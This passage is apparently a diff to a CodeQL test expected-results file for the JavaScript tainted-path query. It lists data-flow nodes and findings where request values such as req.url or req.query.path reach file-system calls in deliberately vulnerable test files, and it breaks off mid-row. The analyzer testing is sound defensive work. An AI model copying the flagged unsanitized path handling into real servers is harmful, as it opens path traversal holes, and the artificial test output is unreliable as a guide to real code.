normalizedPaths.js:31:7:31:49 | path | semmle.label | path | -| normalizedPaths.js:31:14:31:49 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | -| normalizedPaths.js:31:35:31:48 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:36:19:36:22 | path | semmle.label | path | -| normalizedPaths.js:41:21:41:24 | path | semmle.label | path | -| normalizedPaths.js:54:7:54:49 | path | semmle.label | path | -| normalizedPaths.js:54:14:54:49 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | -| normalizedPaths.js:54:35:54:48 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:59:19:59:22 | path | semmle.label | path | -| normalizedPaths.js:63:19:63:22 | path | semmle.label | path | -| normalizedPaths.js:63:19:63:38 | path + "/index.html" | semmle.label | path + "/index.html" | -| normalizedPaths.js:68:21:68:24 | path | semmle.label | path | -| normalizedPaths.js:73:7:73:56 | path | semmle.label | path | -| normalizedPaths.js:73:14:73:56 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | -| normalizedPaths.js:73:35:73:55 | './' + ... ry.path | semmle.label | './' + ... ry.path | -| normalizedPaths.js:73:42:73:55 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:78:22:78:25 | path | semmle.label | path | -| normalizedPaths.js:82:7:82:27 | path | semmle.label | path | -| normalizedPaths.js:82:14:82:27 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:87:29:87:32 | path | semmle.label | path | -| normalizedPaths.js:90:31:90:34 | path | semmle.label | path | -| normalizedPaths.js:94:7:94:49 | path | semmle.label | path | -| normalizedPaths.js:94:14:94:49 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | -| normalizedPaths.js:94:35:94:48 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:99:29:99:32 | path | semmle.label | path | -| normalizedPaths.js:117:7:117:44 | path | semmle.label | path | -| normalizedPaths.js:117:14:117:44 | fs.real ... y.path) | semmle.label | fs.real ... y.path) | -| normalizedPaths.js:117:30:117:43 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:119:19:119:22 | path | semmle.label | path | -| normalizedPaths.js:120:19:120:53 | pathMod ... .html') | semmle.label | pathMod ... .html') | -| normalizedPaths.js:120:35:120:38 | path | semmle.label | path | -| normalizedPaths.js:130:7:130:49 | path | semmle.label | path | -| normalizedPaths.js:130:14:130:49 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | -| normalizedPaths.js:130:35:130:48 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:135:21:135:24 | path | semmle.label | path | -| normalizedPaths.js:139:7:139:62 | path | semmle.label | path | -| normalizedPaths.js:139:14:139:62 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | -| normalizedPaths.js:139:48:139:61 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:144:21:144:24 | path | semmle.label | path | -| normalizedPaths.js:148:7:148:58 | path | semmle.label | path | -| normalizedPaths.js:148:14:148:58 | 'foo/' ... y.path) | semmle.label | 'foo/' ... y.path) | -| normalizedPaths.js:148:23:148:58 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | -| normalizedPaths.js:148:44:148:57 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:151:21:151:24 | path | semmle.label | path | -| normalizedPaths.js:153:21:153:24 | path | semmle.label | path | -| normalizedPaths.js:160:7:160:49 | path | semmle.label | path | -| normalizedPaths.js:160:14:160:49 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | -| normalizedPaths.js:160:35:160:48 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:165:19:165:22 | path | semmle.label | path | -| normalizedPaths.js:170:21:170:24 | path | semmle.label | path | -| normalizedPaths.js:174:7:174:27 | path | semmle.label | path | -| normalizedPaths.js:174:14:174:27 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:184:19:184:22 | path | semmle.label | path | -| normalizedPaths.js:187:21:187:24 | path | semmle.label | path | -| normalizedPaths.js:189:21:189:24 | path | semmle.label | path | -| normalizedPaths.js:192:21:192:24 | path | semmle.label | path | -| normalizedPaths.js:194:21:194:24 | path | semmle.label | path | -| normalizedPaths.js:199:21:199:24 | path | semmle.label | path | -| normalizedPaths.js:201:7:201:49 | normalizedPath | semmle.label | normalizedPath | -| normalizedPaths.js:201:24:201:49 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | -| normalizedPaths.js:201:45:201:48 | path | semmle.label | path | -| normalizedPaths.js:205:21:205:34 | normalizedPath | semmle.label | normalizedPath | -| normalizedPaths.js:208:21:208:34 | normalizedPath | semmle.label | normalizedPath | -| normalizedPaths.js:210:21:210:34 | normalizedPath | semmle.label | normalizedPath | -| normalizedPaths.js:214:7:214:49 | path | semmle.label | path | -| normalizedPaths.js:214:14:214:49 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | -| normalizedPaths.js:214:35:214:48 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:219:3:219:33 | path | semmle.label | path | -| normalizedPaths.js:219:10:219:33 | decodeU ... t(path) | semmle.label | decodeU ... t(path) | -| normalizedPaths.js:219:29:219:32 | path | semmle.label | path | -| normalizedPaths.js:222:21:222:24 | path | semmle.label | path | -| normalizedPaths.js:226:7:226:70 | path | semmle.label | path | -| normalizedPaths.js:226:14:226:49 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | -| normalizedPaths.js:226:14:226:70 | pathMod ... g, ' ') | semmle.label | pathMod ... g, ' ') | -| normalizedPaths.js:226:35:226:48 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:228:21:228:24 | path | semmle.label | path | -| normalizedPaths.js:236:7:236:47 | path | semmle.label | path | -| normalizedPaths.js:236:14:236:47 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | -| normalizedPaths.js:236:33:236:46 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:238:19:238:22 | path | semmle.label | path | -| normalizedPaths.js:245:21:245:24 | path | semmle.label | path | -| normalizedPaths.js:250:21:250:24 | path | semmle.label | path | -| normalizedPaths.js:254:7:254:47 | path | semmle.label | path | -| normalizedPaths.js:254:14:254:47 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | -| normalizedPaths.js:254:33:254:46 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:256:19:256:22 | path | semmle.label | path | -| normalizedPaths.js:262:21:262:24 | path | semmle.label | path | -| normalizedPaths.js:267:7:267:42 | newpath | semmle.label | newpath | -| normalizedPaths.js:267:17:267:42 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | -| normalizedPaths.js:267:38:267:41 | path | semmle.label | path | -| normalizedPaths.js:270:21:270:27 | newpath | semmle.label | newpath | -| normalizedPaths.js:275:7:275:42 | newpath | semmle.label | newpath | -| normalizedPaths.js:275:17:275:42 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | -| normalizedPaths.js:275:38:275:41 | path | semmle.label | path | -| normalizedPaths.js:278:21:278:27 | newpath | semmle.label | newpath | -| normalizedPaths.js:283:7:283:42 | newpath | semmle.label | newpath | -| normalizedPaths.js:283:17:283:42 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | -| normalizedPaths.js:283:38:283:41 | path | semmle.label | path | -| normalizedPaths.js:286:21:286:27 | newpath | semmle.label | newpath | -| normalizedPaths.js:291:7:291:42 | newpath | semmle.label | newpath | -| normalizedPaths.js:291:17:291:42 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | -| normalizedPaths.js:291:38:291:41 | path | semmle.label | path | -| normalizedPaths.js:296:21:296:27 | newpath | semmle.label | newpath | -| normalizedPaths.js:303:6:303:26 | path | semmle.label | path | -| normalizedPaths.js:303:13:303:26 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:304:18:304:21 | path | semmle.label | path | -| normalizedPaths.js:309:19:309:22 | path | semmle.label | path | -| normalizedPaths.js:313:19:313:22 | path | semmle.label | path | -| normalizedPaths.js:316:19:316:22 | path | semmle.label | path | -| normalizedPaths.js:320:6:320:49 | normalizedPath | semmle.label | normalizedPath | -| normalizedPaths.js:320:23:320:49 | pathMod ... , path) | semmle.label | pathMod ... , path) | -| normalizedPaths.js:320:45:320:48 | path | semmle.label | path | -| normalizedPaths.js:325:19:325:32 | normalizedPath | semmle.label | normalizedPath | -| normalizedPaths.js:332:19:332:32 | normalizedPath | semmle.label | normalizedPath | -| normalizedPaths.js:339:6:339:46 | path | semmle.label | path | -| normalizedPaths.js:339:13:339:46 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | -| normalizedPaths.js:339:32:339:45 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:341:18:341:21 | path | semmle.label | path | -| normalizedPaths.js:346:19:346:22 | path | semmle.label | path | -| normalizedPaths.js:354:7:354:27 | path | semmle.label | path | -| normalizedPaths.js:354:14:354:27 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:356:19:356:22 | path | semmle.label | path | -| normalizedPaths.js:358:7:358:51 | requestPath | semmle.label | requestPath | -| normalizedPaths.js:358:21:358:51 | pathMod ... , path) | semmle.label | pathMod ... , path) | -| normalizedPaths.js:358:47:358:50 | path | semmle.label | path | -| normalizedPaths.js:363:21:363:31 | requestPath | semmle.label | requestPath | -| normalizedPaths.js:377:7:377:27 | path | semmle.label | path | -| normalizedPaths.js:377:14:377:27 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:379:19:379:22 | path | semmle.label | path | -| normalizedPaths.js:381:19:381:29 | slash(path) | semmle.label | slash(path) | -| normalizedPaths.js:381:25:381:28 | path | semmle.label | path | -| normalizedPaths.js:385:7:385:46 | path | semmle.label | path | -| normalizedPaths.js:385:14:385:46 | pathMod ... uery.x) | semmle.label | pathMod ... uery.x) | -| normalizedPaths.js:385:35:385:45 | req.query.x | semmle.label | req.query.x | -| normalizedPaths.js:388:19:388:22 | path | semmle.label | path | -| normalizedPaths.js:399:21:399:24 | path | semmle.label | path | -| normalizedPaths.js:407:19:407:67 | pathMod ... t('/')) | semmle.label | pathMod ... t('/')) | -| normalizedPaths.js:407:45:407:55 | req.query.x | semmle.label | req.query.x | -| normalizedPaths.js:407:45:407:66 | req.que ... it('/') | semmle.label | req.que ... it('/') | -| normalizedPaths.js:408:19:408:60 | pathMod ... t('/')) | semmle.label | pathMod ... t('/')) | -| normalizedPaths.js:408:38:408:48 | req.query.x | semmle.label | req.query.x | -| normalizedPaths.js:408:38:408:59 | req.que ... it('/') | semmle.label | req.que ... it('/') | -| normalizedPaths.js:412:7:412:46 | path | semmle.label | path | -| normalizedPaths.js:412:14:412:46 | pathMod ... uery.x) | semmle.label | pathMod ... uery.x) | -| normalizedPaths.js:412:35:412:45 | req.query.x | semmle.label | req.query.x | -| normalizedPaths.js:415:19:415:22 | path | semmle.label | path | -| normalizedPaths.js:426:21:426:24 | path | semmle.label | path | -| other-fs-libraries.js:9:7:9:48 | path | semmle.label | path | -| other-fs-libraries.js:9:14:9:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| other-fs-libraries.js:9:14:9:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| other-fs-libraries.js:9:14:9:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| other-fs-libraries.js:9:24:9:30 | req.url | semmle.label | req.url | -| other-fs-libraries.js:11:19:11:22 | path | semmle.label | path | -| other-fs-libraries.js:12:27:12:30 | path | semmle.label | path | -| other-fs-libraries.js:13:24:13:27 | path | semmle.label | path | -| other-fs-libraries.js:14:27:14:30 | path | semmle.label | path | -| other-fs-libraries.js:16:34:16:37 | path | semmle.label | path | -| other-fs-libraries.js:17:35:17:38 | path | semmle.label | path | -| other-fs-libraries.js:19:56:19:59 | path | semmle.label | path | -| other-fs-libraries.js:24:35:24:38 | path | semmle.label | path | -| other-fs-libraries.js:38:7:38:48 | path | semmle.label | path | -| other-fs-libraries.js:38:14:38:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| other-fs-libraries.js:38:14:38:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| other-fs-libraries.js:38:14:38:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| other-fs-libraries.js:38:24:38:30 | req.url | semmle.label | req.url | -| other-fs-libraries.js:40:35:40:38 | path | semmle.label | path | -| other-fs-libraries.js:41:50:41:53 | path | semmle.label | path | -| other-fs-libraries.js:42:53:42:56 | path | semmle.label | path | -| other-fs-libraries.js:49:7:49:48 | path | semmle.label | path | -| other-fs-libraries.js:49:14:49:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| other-fs-libraries.js:49:14:49:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| other-fs-libraries.js:49:14:49:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| other-fs-libraries.js:49:24:49:30 | req.url | semmle.label | req.url | -| other-fs-libraries.js:51:19:51:22 | path | semmle.label | path | -| other-fs-libraries.js:52:24:52:27 | path | semmle.label | path | -| other-fs-libraries.js:54:36:54:39 | path | semmle.label | path | -| other-fs-libraries.js:55:36:55:39 | path | semmle.label | path | -| other-fs-libraries.js:57:46:57:49 | path | semmle.label | path | -| other-fs-libraries.js:59:39:59:42 | path | semmle.label | path | -| other-fs-libraries.js:62:43:62:46 | path | semmle.label | path | -| other-fs-libraries.js:63:51:63:54 | path | semmle.label | path | -| other-fs-libraries.js:68:7:68:48 | path | semmle.label | path | -| other-fs-libraries.js:68:14:68:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| other-fs-libraries.js:68:14:68:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| other-fs-libraries.js:68:14:68:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| other-fs-libraries.js:68:24:68:30 | req.url | semmle.label | req.url | -| other-fs-libraries.js:70:19:70:22 | path | semmle.label | path | -| other-fs-libraries.js:71:10:71:13 | path | semmle.label | path | -| other-fs-libraries.js:72:15:72:18 | path | semmle.label | path | -| other-fs-libraries.js:73:8:73:11 | path | semmle.label | path | -| other-fs-libraries.js:75:15:75:15 | x | semmle.label | x | -| other-fs-libraries.js:76:19:76:19 | x | semmle.label | x | -| other-fs-libraries.js:81:7:81:48 | path | semmle.label | path | -| other-fs-libraries.js:81:14:81:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| other-fs-libraries.js:81:14:81:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| other-fs-libraries.js:81:14:81:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| other-fs-libraries.js:81:24:81:30 | req.url | semmle.label | req.url | -| other-fs-libraries.js:83:16:83:19 | path | semmle.label | path | -| prettier.js:6:11:6:28 | p | semmle.label | p | -| prettier.js:6:13:6:13 | p | semmle.label | p | -| prettier.js:7:28:7:28 | p | semmle.label | p | -| prettier.js:11:44:11:44 | p | semmle.label | p | -| pupeteer.js:5:9:5:71 | tainted | semmle.label | tainted | -| pupeteer.js:5:19:5:71 | "dir/" ... t.data" | semmle.label | "dir/" ... t.data" | -| pupeteer.js:5:28:5:53 | parseTo ... t).name | semmle.label | parseTo ... t).name | -| pupeteer.js:9:28:9:34 | tainted | semmle.label | tainted | -| pupeteer.js:13:37:13:43 | tainted | semmle.label | tainted | -| sharedlib-repro.js:13:22:13:43 | req.par ... spaceId | semmle.label | req.par ... spaceId | -| sharedlib-repro.js:21:27:21:34 | filepath | semmle.label | filepath | -| sharedlib-repro.js:22:18:22:25 | filepath | semmle.label | filepath | -| tainted-access-paths.js:6:7:6:48 | path | semmle.label | path | -| tainted-access-paths.js:6:14:6:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| tainted-access-paths.js:6:14:6:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| tainted-access-paths.js:6:14:6:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| tainted-access-paths.js:6:24:6:30 | req.url | semmle.label | req.url | -| tainted-access-paths.js:8:19:8:22 | path | semmle.label | path | -| tainted-access-paths.js:10:7:10:36 | obj | semmle.label | obj | -| tainted-access-paths.js:10:33:10:36 | path | semmle.label | path | -| tainted-access-paths.js:12:19:12:21 | obj | semmle.label | obj | -| tainted-access-paths.js:12:19:12:25 | obj.sub | semmle.label | obj.sub | -| tainted-access-paths.js:26:19:26:21 | obj | semmle.label | obj | -| tainted-access-paths.js:26:19:26:26 | obj.sub3 | semmle.label | obj.sub3 | -| tainted-access-paths.js:29:21:29:23 | obj | semmle.label | obj | -| tainted-access-paths.js:29:21:29:28 | obj.sub4 | semmle.label | obj.sub4 | -| tainted-access-paths.js:30:23:30:25 | obj | semmle.label | obj | -| tainted-access-paths.js:30:23:30:30 | obj.sub4 | semmle.label | obj.sub4 | -| tainted-access-paths.js:31:23:31:25 | obj | semmle.label | obj | -| tainted-access-paths.js:31:23:31:30 | obj.sub4 | semmle.label | obj.sub4 | -| tainted-access-paths.js:39:7:39:48 | path | semmle.label | path | -| tainted-access-paths.js:39:14:39:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| tainted-access-paths.js:39:14:39:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| tainted-access-paths.js:39:14:39:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| tainted-access-paths.js:39:24:39:30 | req.url | semmle.label | req.url | -| tainted-access-paths.js:40:23:40:26 | path | semmle.label | path | -| tainted-access-paths.js:48:7:48:48 | path | semmle.label | path | -| tainted-access-paths.js:48:14:48:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| tainted-access-paths.js:48:14:48:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| tainted-access-paths.js:48:14:48:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| tainted-access-paths.js:48:24:48:30 | req.url | semmle.label | req.url | -| tainted-access-paths.js:49:10:49:13 | path | semmle.label | path | -| tainted-promise-steps.js:6:7:6:48 | path | semmle.label | path | -| tainted-promise-steps.js:6:14:6:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| tainted-promise-steps.js:6:14:6:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| tainted-promise-steps.js:6:14:6:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| tainted-promise-steps.js:6:24:6:30 | req.url | semmle.label | req.url | -| tainted-promise-steps.js:7:10:7:30 | Promise ... e(path) [PromiseValue] | semmle.label | Promise ... e(path) [PromiseValue] | -| tainted-promise-steps.js:7:26:7:29 | path | semmle.label | path | -| tainted-promise-steps.js:10:23:10:33 | pathPromise [PromiseValue] | semmle.label | pathPromise [PromiseValue] | -| tainted-promise-steps.js:11:19:11:35 | await pathPromise | semmle.label | await pathPromise | -| tainted-promise-steps.js:11:25:11:35 | pathPromise [PromiseValue] | semmle.label | pathPromise [PromiseValue] | -| tainted-promise-steps.js:12:3:12:13 | pathPromise [PromiseValue] | semmle.label | pathPromise [PromiseValue] | -| tainted-promise-steps.js:12:20:12:23 | path | semmle.label | path | -| tainted-promise-steps.js:12:44:12:47 | path | semmle.label | path | -| tainted-require.js:7:19:7:37 | req.param("module") | semmle.label | req.param("module") | -| tainted-require.js:12:29:12:47 | req.param("module") | semmle.label | req.param("module") | -| tainted-require.js:14:11:14:29 | req.param("module") | semmle.label | req.param("module") | -| tainted-sendFile.js:8:16:8:33 | req.param("gimme") | semmle.label | req.param("gimme") | -| tainted-sendFile.js:10:16:10:33 | req.param("gimme") | semmle.label | req.param("gimme") | -| tainted-sendFile.js:18:43:18:58 | req.param("dir") | semmle.label | req.param("dir") | -| tainted-sendFile.js:24:16:24:49 | path.re ... rams.x) | semmle.label | path.re ... rams.x) | -| tainted-sendFile.js:24:37:24:48 | req.params.x | semmle.label | req.params.x | -| tainted-sendFile.js:25:16:25:46 | path.jo ... rams.x) | semmle.label | path.jo ... rams.x) | -| tainted-sendFile.js:25:34:25:45 | req.params.x | semmle.label | req.params.x | -| tainted-sendFile.js:30:16:30:33 | req.param("gimme") | semmle.label | req.param("gimme") | -| tainted-sendFile.js:33:16:33:48 | homeDir ... arams.x | semmle.label | homeDir ... arams.x | -| tainted-sendFile.js:33:37:33:48 | req.params.x | semmle.label | req.params.x | -| tainted-sendFile.js:35:16:35:46 | path.jo ... rams.x) | semmle.label | path.jo ... rams.x) | -| tainted-sendFile.js:35:34:35:45 | req.params.x | semmle.label | req.params.x | -| tainted-sendFile.js:38:43:38:58 | req.param("dir") | semmle.label | req.param("dir") | -| tainted-string-steps.js:6:7:6:48 | path | semmle.label | path | -| tainted-string-steps.js:6:14:6:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| tainted-string-steps.js:6:14:6:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| tainted-string-steps.js:6:14:6:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| tainted-string-steps.js:6:24:6:30 | req.url | semmle.label | req.url | -| tainted-string-steps.js:8:18:8:21 | path | semmle.label | path | -| tainted-string-steps.js:8:18:8:34 | path.substring(4) | semmle.label | path.substring(4) | -| tainted-string-steps.js:9:18:9:21 | path | semmle.label | path | -| tainted-string-steps.js:9:18:9:37 | path.substring(0, i) | semmle.label | path.substring(0, i) | -| tainted-string-steps.js:10:18:10:21 | path | semmle.label | path | -| tainted-string-steps.js:10:18:10:31 | path.substr(4) | semmle.label | path.substr(4) | -| tainted-string-steps.js:11:18:11:21 | path | semmle.label | path | -| tainted-string-steps.js:11:18:11:30 | path.slice(4) | semmle.label | path.slice(4) | -| tainted-string-steps.js:13:18:13:21 | path | semmle.label | path | -| tainted-string-steps.js:13:18:13:37 | path.concat(unknown) | semmle.label | path.concat(unknown) | -| tainted-string-steps.js:14:18:14:37 | unknown.concat(path) | semmle.label | unknown.concat(path) | -| tainted-string-steps.js:14:33:14:36 | path | semmle.label | path | -| tainted-string-steps.js:15:18:15:46 | unknown ... , path) | semmle.label | unknown ... , path) | -| tainted-string-steps.js:15:42:15:45 | path | semmle.label | path | -| tainted-string-steps.js:17:18:17:21 | path | semmle.label | path | -| tainted-string-steps.js:17:18:17:28 | path.trim() | semmle.label | path.trim() | -| tainted-string-steps.js:18:18:18:21 | path | semmle.label | path | -| tainted-string-steps.js:18:18:18:35 | path.toLowerCase() | semmle.label | path.toLowerCase() | -| tainted-string-steps.js:22:18:22:21 | path | semmle.label | path | -| tainted-string-steps.js:22:18:22:32 | path.split('/') | semmle.label | path.split('/') | -| tainted-string-steps.js:22:18:22:35 | path.split('/')[i] | semmle.label | path.split('/')[i] | -| tainted-string-steps.js:23:18:23:21 | path | semmle.label | path | -| tainted-string-steps.js:23:18:23:33 | path.split(/\\//) | semmle.label | path.split(/\\//) | -| tainted-string-steps.js:23:18:23:36 | path.split(/\\//)[i] | semmle.label | path.split(/\\//)[i] | -| tainted-string-steps.js:24:18:24:21 | path | semmle.label | path | -| tainted-string-steps.js:24:18:24:32 | path.split("?") | semmle.label | path.split("?") | -| tainted-string-steps.js:24:18:24:35 | path.split("?")[0] | semmle.label | path.split("?")[0] | -| tainted-string-steps.js:26:18:26:21 | path | semmle.label | path | -| tainted-string-steps.js:26:18:26:36 | path.split(unknown) | semmle.label | path.split(unknown) | -| tainted-string-steps.js:26:18:26:45 | path.sp ... hatever | semmle.label | path.sp ... hatever | -| tainted-string-steps.js:27:18:27:21 | path | semmle.label | path | -| tainted-string-steps.js:27:18:27:36 | path.split(unknown) | semmle.label | path.split(unknown) | -| torrents.js:5:6:5:38 | name | semmle.label | name | -| torrents.js:5:13:5:38 | parseTo ... t).name | semmle.label | parseTo ... t).name | -| torrents.js:6:6:6:45 | loc | semmle.label | loc | -| torrents.js:6:12:6:45 | dir + " ... t.data" | semmle.label | dir + " ... t.data" | -| torrents.js:6:24:6:27 | name | semmle.label | name | -| torrents.js:7:25:7:27 | loc | semmle.label | loc | -| typescript.ts:9:7:9:48 | path | semmle.label | path | -| typescript.ts:9:14:9:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| typescript.ts:9:14:9:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| typescript.ts:9:14:9:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| typescript.ts:9:24:9:30 | req.url | semmle.label | req.url | -| typescript.ts:12:29:12:32 | path | semmle.label | path | -| typescript.ts:20:7:20:18 | path3 | semmle.label | path3 | -| typescript.ts:20:15:20:18 | path | semmle.label | path | -| typescript.ts:21:39:21:43 | path3 | semmle.label | path3 | -| typescript.ts:23:7:23:18 | path4 | semmle.label | path4 | -| typescript.ts:23:15:23:18 | path | semmle.label | path | -| typescript.ts:24:39:24:43 | path4 | semmle.label | path4 | -| typescript.ts:30:7:30:18 | path6 | semmle.label | path6 | -| typescript.ts:30:15:30:18 | path | semmle.label | path | -| typescript.ts:32:29:32:33 | path6 | semmle.label | path6 | -| views.js:1:43:1:55 | req.params[0] | semmle.label | req.params[0] | +#select +| TaintedPath-es6.js:9:26:9:45 | join("public", path) | TaintedPath-es6.js:7:20:7:26 | req.url | TaintedPath-es6.js:9:26:9:45 | join("public", path) | This path depends on a $@. | TaintedPath-es6.js:7:20:7:26 | req.url | user-provided value | +| TaintedPath.js:11:29:11:32 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:11:29:11:32 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | +| TaintedPath.js:13:29:13:48 | "/home/user/" + path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:13:29:13:48 | "/home/user/" + path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | +| TaintedPath.js:16:33:16:36 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:16:33:16:36 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | +| TaintedPath.js:19:33:19:36 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:19:33:19:36 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | +| TaintedPath.js:22:33:22:36 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:22:33:22:36 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | +| TaintedPath.js:31:31:31:34 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:31:31:31:34 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | +| TaintedPath.js:39:29:39:52 | pathMod ... e(path) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:39:29:39:52 | pathMod ... e(path) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:42:29:42:49 | pathMod ... n(path) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:42:29:42:49 | pathMod ... n(path) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:43:29:43:58 | pathMod ... ath, z) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:43:29:43:58 | pathMod ... ath, z) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:44:29:44:54 | pathMod ... e(path) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:44:29:44:54 | pathMod ... e(path) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:45:29:45:56 | pathMod ... , path) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:45:29:45:56 | pathMod ... , path) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:46:29:46:56 | pathMod ... ath, x) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:46:29:46:56 | pathMod ... ath, x) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:47:29:47:52 | pathMod ... e(path) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:47:29:47:52 | pathMod ... e(path) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:48:29:48:61 | pathMod ... ath, z) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:48:29:48:61 | pathMod ... ath, z) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:49:29:49:61 | pathMod ... h(path) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:49:29:49:61 | pathMod ... h(path) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:54:31:54:76 | require ... ).query | TaintedPath.js:54:63:54:69 | req.url | TaintedPath.js:54:31:54:76 | require ... ).query | This path depends on a $@. | TaintedPath.js:54:63:54:69 | req.url | user-provided value | +| TaintedPath.js:55:31:55:74 | require ... ).query | TaintedPath.js:55:61:55:67 | req.url | TaintedPath.js:55:31:55:74 | require ... ).query | This path depends on a $@. | TaintedPath.js:55:61:55:67 | req.url | user-provided value | +| TaintedPath.js:56:31:56:73 | require ... ).query | TaintedPath.js:56:60:56:66 | req.url | TaintedPath.js:56:31:56:73 | require ... ).query | This path depends on a $@. | TaintedPath.js:56:60:56:66 | req.url | user-provided value | +| TaintedPath.js:64:48:64:60 | req.params[0] | TaintedPath.js:64:48:64:60 | req.params[0] | TaintedPath.js:64:48:64:60 | req.params[0] | This path depends on a $@. | TaintedPath.js:64:48:64:60 | req.params[0] | user-provided value | +| TaintedPath.js:75:28:75:48 | fs.real ... c(path) | TaintedPath.js:73:23:73:29 | req.url | TaintedPath.js:75:28:75:48 | fs.real ... c(path) | This path depends on a $@. | TaintedPath.js:73:23:73:29 | req.url | user-provided value | +| TaintedPath.js:78:45:78:52 | realpath | TaintedPath.js:73:23:73:29 | req.url | TaintedPath.js:78:45:78:52 | realpath | This path depends on a $@. | TaintedPath.js:73:23:73:29 | req.url | user-provided value | +| TaintedPath.js:111:23:111:26 | path | TaintedPath.js:109:23:109:29 | req.url | 